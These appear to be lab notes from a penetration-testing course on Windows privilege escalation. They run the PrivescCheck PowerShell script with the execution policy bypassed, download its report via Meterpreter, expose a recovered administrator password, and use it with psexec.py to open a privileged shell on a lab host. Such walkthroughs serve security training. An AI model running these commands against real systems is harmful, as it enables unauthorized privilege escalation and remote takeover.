PrivescCheck script

#Privilege Escalation

cd C:\\Users\\student\\Desktop\\PrivescCheck
shell
dir
# Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

# Extended Mode + Export Txt Report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
exit
meterpreter > download PrivescCheck_ATTACKDEFENSE.txt

root@attackdefense:~# featherpad PrivescCheck_ATTACKDEFENSE.txt

📌 administrator:hello_123321

Administrator Login

  • Use the administrator user to run a privileged cmd, trying SMB legitimate authentication

psexec.py administrator@10.2.29.53 cmd.exe
PreviousUAC Bypass:Memory InjectionNextAccess Token

Last updated